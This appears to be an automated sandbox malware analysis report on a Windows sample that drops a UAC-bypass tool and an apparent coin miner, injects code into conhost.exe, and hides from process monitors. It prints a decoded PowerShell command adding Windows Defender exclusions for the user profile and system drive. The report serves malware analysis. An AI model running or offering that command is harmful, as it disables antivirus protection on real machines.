Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F00BD pushad ; iretd	0_2_00007FFD343F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD342CD2A5 pushad ; iretd	2_2_00007FFD342CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343E00BD pushad ; iretd	2_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343E84FA push ebx; ret	2_2_00007FFD343E85AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343E85AB push ebx; ret	2_2_00007FFD343E85AA
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00007FFD344A1C7A push ebx; ret	7_2_00007FFD344A1CEA

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	File created: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	File created: C:\Users\user\AppData\Local\Temp\Cool.exe	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Local\Temp\services64.exe	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Memory allocated: 1800000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Memory allocated: 1B550000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4236	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5588	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 2200
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 435
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 2626

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe TID: 6428	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540	Thread sleep time: -11068046444225724s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: conhost.exe, 00000012.00000002.2237873600.0000025C7E4D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: conhost.exe, 00000012.00000002.2234497400.0000025C64234000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\
Source: conhost.exe, 00000012.00000002.2237873600.0000025C7E4D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE425280 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF6FE425280
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE424D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF6FE424D5C
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE425424 SetUnhandledExceptionFilter,	5_2_00007FF6FE425424

Windows Analysis Report GcqJPBLD2Q.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
GcqJPBLD2Q.exe

Malware Threat Intel
Provided by

Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 236C4F60000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1EC44910000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2474E5A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 25C64110000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1D90D160000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 24457CD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 2A914300000 protect: page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Thread created: C:\Windows\System32\conhost.exe EIP: C4F60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 44910000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 4E5A0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 64110000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: D160000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 57CD0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 14300000	Jump to behavior

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: Base64 decoded <#kke#>Add-MpPreference <#ifv#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#crq#> -Force <#cyg#>
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: Base64 decoded <#kke#>Add-MpPreference <#ifv#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#crq#> -Force <#cyg#>			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtCreateThreadEx: Direct from: 0x401A17	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtWriteVirtualMemory: Direct from: 0x401D57	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtProtectVirtualMemory: Direct from: 0x401DD7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtClose: Direct from: 0x401CD7
